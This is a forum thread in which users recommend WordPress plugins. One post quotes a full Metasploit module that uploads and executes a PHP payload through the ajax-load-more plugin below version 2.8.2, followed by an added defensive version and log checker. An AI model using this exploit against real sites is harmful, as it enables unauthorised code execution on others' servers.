What are your favorite WordPress Plugins?

aceofadsense

New member
Joined
Jan 22, 2013
Messages
69
Points
0
Are you running a blog on the WordPress CMS? What are your favorite WordPress plugins that you would recommend for better blogging?
 

SIG

Active member
Joined
Oct 16, 2015
Messages
123
Points
28
My favorite WordPress plugins are:

  1. WordFence (Security plugin) - very important plugin.
  2. Jetpack (by WordPress) - good for viewing visitors, search terms, what visitors clicked on, where they came from, etc. - It also comes with a bunch of handy features.
  3. WPSmush - to reduce image sizes - good for speeding up your blog/site a little bit.
  4. Contact form 7 - good contact form creator.


That is pretty much it.
 

Hugo E.

Active member
Joined
Sep 8, 2014
Messages
288
Points
28
In my personal opinion, WP is already secure, so why do you need a security plugin for it? It's weird.
 

SIG

Active member
Joined
Oct 16, 2015
Messages
123
Points
28
WordPress has vulnerabilities, and can be hacked. And I can prove it.

This is the most recent one:
WordPress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability

Discovered on: 2015-10-18

Going off-topic with this:
Code:
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
   
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
   
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
          ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com>', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
     
    register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
   
  def user
    datastore['WP_USER']
  end
   
  def password
    datastore['WP_PASSWORD']
  end
   
  def check
    # Check plugin version
    ver = check_plugin_version_from_readme('ajax-load-more', '2.8.2')
    if ver
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
   
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
     
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
     
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end
 
    print_status("#{peer} - Trying to upload payload")
     
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
     
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
     
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
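
For site owners, a defensive check for the issue in the post above, as an added example that is not part of the original post or of the Metasploit project: it reads the plugin's readme.txt "Stable tag" to see whether the install is below 2.8.2, and flags access-log requests that hit the plugin's core/repeater directory directly. The helper names, the sample readme and the sample log lines are constructed, and it assumes direct HTTP requests to that directory are not part of normal plugin operation.

```ruby
require 'rubygems' # Gem::Version gives correct dotted-version comparison

# First fixed release, taken from the advisory title quoted in the post.
FIXED_VERSION = Gem::Version.new('2.8.2')

# Direct request for a PHP file in the plugin's repeater template directory
# (the path the posted module requests after its upload step).
REPEATER_RE = %r{"(?:GET|POST) (\S*/plugins/ajax-load-more/core/repeater/[^/\s?]+\.php)\S* HTTP}

# Returns the "Stable tag:" version from a plugin readme.txt, or nil if absent.
def stable_tag(readme_text)
  m = readme_text.match(/^\s*Stable tag:\s*(\d+(?:\.\d+)*)\s*$/i)
  m && Gem::Version.new(m[1])
end

# :vulnerable, :patched, or :unknown (no parsable tag, so inspect by hand).
def plugin_status(readme_text)
  version = stable_tag(readme_text)
  return :unknown if version.nil?

  version < FIXED_VERSION ? :vulnerable : :patched
end

# Returns [client_ip, path] pairs for log lines that request the repeater directory.
def repeater_hits(log_lines)
  log_lines.filter_map do |line|
    m = REPEATER_RE.match(line)
    [line.split(' ', 2).first, m[1]] if m
  end
end

# Constructed sample input (not taken from a real site).
SAMPLE_README = <<~TXT
  === Ajax Load More ===
  Requires at least: 3.6
  Stable tag: 2.7.3
TXT

SAMPLE_LOG = [
  '203.0.113.7 - - [18/Oct/2015:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512',
  '203.0.113.7 - - [18/Oct/2015:10:01:03 +0000] "GET /wp-content/plugins/ajax-load-more/core/repeater/default.php HTTP/1.1" 200 0',
  '198.51.100.4 - - [18/Oct/2015:10:02:00 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 8431'
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "plugin status: #{plugin_status(SAMPLE_README)}"
  repeater_hits(SAMPLE_LOG).each { |ip, path| puts "direct repeater request: #{ip} #{path}" }
end
```

A `:vulnerable` result means the plugin should be updated to 2.8.2 or later; any repeater hit is worth correlating with logins from the same address.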
 

SenseiSteve

Active member
Joined
Nov 11, 2015
Messages
215
Points
28
SEO by Yoast
WordFence
Contact Form 7
WP Edit

And yes, WordPress sites get hacked all the time. Keeping your themes and plugins up to date helps, but make sure you download plugins from authority sites and ensure they stay up to date with the current version of WordPress.
 

ulterios

New member
Joined
Nov 25, 2015
Messages
1,267
Points
0
It all depends on the site in some cases, but in general here are my favorites:

WordFence Security - Lots of good features and has a cache option which actually works real well

Slider Captcha - Keeps bots from trying to login to my site as well as eliminate spam

Google Analytics Dashboard for WP - To keep track of traffic and visitors

All In One SEO Pack - A lot of good stuff to make some SEO tasks easier.
 

Ron Killian

New member
Joined
Dec 3, 2015
Messages
804
Points
0
I agree WordPress can be hacked. Anything can be hacked. Though most people who own WordPress have NO clue how many times each day people (bots) try to break in. Until you have a good security plugin, then you see what the bad guys are trying to do.

I put in another vote for Wordfence, great plugin.

Tried several image compression plugins, but best I found was Kraken. Works great.

Also like Intense WordPress plugin. Tons of shortcodes to dress up my content very nicely.

Disqus for comments.

As Ulterios said, Google analytics dashboard is nice.

MCE table button, gotta have tables.

Premium SEO pack - for obvious reasons.

Q2W3 Fixed Widget - Fixes widgets you want to stay in the sidebar as people scroll.

Simple Page Sidebars - Make custom sidebars and any post or page.

Uber Menu for better menus, bigger, etc.

Wp Author Box - Much better author box.

WP Ad Pro to rotate ads and banners, track ad stats.

Just started using Zendesk for support. Think I like it. Can't say 100% yet. But there are not many good support plugins out there.

Woocommerce and many related plug-ins for it.
 

dnapick

New member
Joined
Jan 22, 2016
Messages
2
Points
0
It depends on the project, but I always use:

SEO by Yoast
Custom CSS
WP Super Cache
 

tayyabwpb

New member
Joined
Apr 6, 2021
Messages
29
Points
3
My favorite SEO plugins are:

  1. Analytify for Google Analytics
  2. Yoast SEO for SEO purpose
  3. WP Rocket for Website Speed Optimization
  4. Imagify for Image Optimization
  5. Autoptimize for CSS & JS minification
  6. LoginPress for custom login page & Login Page Security
 
anad7kumar

New member
Joined
Dec 16, 2023
Messages
2
Points
1
My favorite plugins are Elementor, Starter Sites Kit, Yoast SEO, and Classic Editor.
 

Daniel@30

Active member
Joined
Apr 6, 2018
Messages
166
Points
28
  1. Yoast SEO: Helps optimize content for search engines and improves overall SEO.
  2. WP Super Cache: Speeds up website performance by generating static HTML files for faster page loads.
  3. Elementor: A user-friendly page builder that simplifies website design and customization.
 